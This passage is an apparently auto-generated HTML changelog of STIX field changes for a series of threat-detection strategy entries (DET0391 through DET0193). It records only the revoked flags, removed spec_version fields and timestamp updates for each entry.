solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0391] Detection Strategy for Runtime Data Manipulation.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0453] Detection Strategy for SNMP (MIB Dump) on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0181] Detection Strategy for SQL Stored Procedures Abuse via T1505.001</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0126] Detection Strategy for SSH Key Injection in Authorized Keys</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0256] Detection Strategy for SSH Session Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0510] Detection Strategy for SVG Smuggling with Script Execution and Delivery Behavior</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0116] Detection Strategy for Safe Mode Boot Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0399] Detection Strategy for Scheduled Transfer and Recurrent Exfiltration Patterns</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0374] Detection Strategy for Serverless Execution (T1648)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0236] Detection Strategy for Spearphishing Attachment across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0107] Detection Strategy for Spearphishing Links</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0245] Detection Strategy for Spearphishing Voice across OS platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0115] Detection Strategy for Spearphishing via a Service across OS Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0240] Detection Strategy for Steal or Forge Authentication Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0119] Detection Strategy for Steganographic Abuse in File & Script Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0193] Detection Strategy for Stored Data Manipulation across OS Platforms.</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th 